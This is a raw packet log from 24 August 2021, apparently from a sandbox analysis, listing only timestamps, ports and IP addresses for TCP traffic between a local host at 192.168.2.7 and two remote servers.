Aug 24, 2021 08:46:56.662782907 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.662806034 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.662830114 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.662856102 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.662869930 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.662879944 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.662903070 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.662903070 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.662928104 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.662946939 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.662951946 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.662981987 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663000107 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.663003922 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663038015 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663059950 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663081884 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.663083076 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663108110 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663145065 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.663162947 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663182020 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.663189888 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663208008 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663230896 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663247108 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.663254976 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663279057 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663300037 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.663302898 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663327932 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663337946 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.663352013 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663378954 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663383961 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.663405895 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663424015 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663431883 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.663440943 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663458109 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663470030 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.663475037 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663491964 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663506031 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.663510084 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663522005 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663538933 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663548946 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.663557053 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663569927 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.663573980 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663589954 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663609982 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663619995 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.663629055 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663645029 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663657904 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.663661957 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663680077 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663695097 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.663697004 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663710117 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663722038 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.663727045 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663744926 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663757086 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.663762093 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663779020 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663789034 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.663795948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663813114 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663821936 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.663844109 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663852930 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.663861990 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663880110 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663901091 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663914919 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.663924932 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663942099 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.663943052 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663955927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663973093 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.663985968 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.664017916 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.664045095 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.664063931 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.664083004 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.664100885 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.664108038 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.664119959 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.664132118 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.664144993 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.664171934 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.664180040 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.664237976 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.669800997 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.673027992 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.673053980 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.673065901 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.673079967 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.673095942 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.673146009 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.673181057 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.686250925 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.686290026 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.686306953 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.686327934 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.686350107 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.686374903 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.686398983 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.686422110 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.686441898 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.686465025 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.686480045 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.686500072 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.686518908 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.686534882 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.686551094 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.686568022 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.686583042 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.686600924 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.686619997 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.686640978 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.686767101 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.686892033 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.686914921 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.686935902 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.686933994 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.686959028 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.686980963 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.686985016 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687005043 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687006950 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.687021971 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687038898 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687050104 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.687053919 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687079906 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687103033 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.687104940 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687143087 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.687196016 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687217951 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687232018 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687244892 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687268972 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687268972 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.687287092 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687305927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687325001 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.687325954 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687351942 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687357903 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.687371016 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687392950 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.687392950 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687401056 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.687419891 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687443972 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.687444925 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687469959 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687490940 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.687494040 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687520027 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687535048 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.687544107 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687561989 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687577963 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687593937 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687608957 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.687609911 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687628984 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687643051 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.687648058 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687664986 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687671900 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.687684059 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687700033 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687701941 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.687716007 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687732935 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687735081 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.687757015 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.687774897 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687792063 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687808037 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.687832117 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.687865973 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.692131042 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.692157984 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.692173958 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.692249060 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.693367958 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.696037054 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.696060896 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.696077108 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.696096897 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.696095943 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.696119070 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.696122885 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.696171045 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.710124969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710155010 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710190058 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710212946 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710238934 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710242033 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.710283995 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710288048 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.710306883 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710319996 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.710334063 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710355997 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710382938 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710397005 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.710407972 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710431099 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.710431099 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710455894 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710477114 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.710479975 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710498095 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710519075 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.710520029 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710542917 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710562944 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710575104 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.710606098 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.710607052 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710633039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710654974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710678101 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710699081 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710702896 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.710731983 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.710731983 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710760117 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710782051 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.710798025 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710834026 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710850000 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710866928 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710880041 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.710882902 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710900068 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710912943 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.710916042 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710935116 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710938931 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.710956097 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710966110 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.710975885 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.710999966 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.711005926 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.711023092 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.711039066 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.711049080 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.711055040 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.711072922 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.711081982 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.711090088 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.711108923 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.711134911 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.711141109 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.711157084 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.711174011 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.711189985 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.711194992 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.711206913 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.711218119 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.711226940 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.711245060 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.711245060 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.711262941 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.711275101 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.711280107 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.711301088 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.711308956 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.711322069 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.711339951 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.711355925 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.711365938 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.711374044 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.711390018 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.711400032 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.711410046 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.711416006 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.711429119 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.711446047 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.711455107 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.711478949 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.714644909 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.714672089 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.714715958 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.714734077 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.714739084 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.714760065 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.714802027 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.714975119 CEST	443	49717	74.114.154.22	192.168.2.7
Aug 24, 2021 08:46:56.715085030 CEST	49717	443	192.168.2.7	74.114.154.22
Aug 24, 2021 08:46:56.718122959 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.718162060 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.718187094 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.718204975 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.718246937 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.720393896 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.733578920 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.733625889 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.733671904 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.733692884 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.733714104 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.733755112 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.733771086 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.733778954 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.733802080 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.733824015 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.733845949 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.733845949 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.733875036 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.733879089 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.733901024 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.733921051 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.733923912 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.733946085 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.733972073 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.733998060 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734009027 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.734019995 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734044075 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.734045982 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734064102 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.734071970 CEST	80	49715	212.224.105.79	192.168.2.7
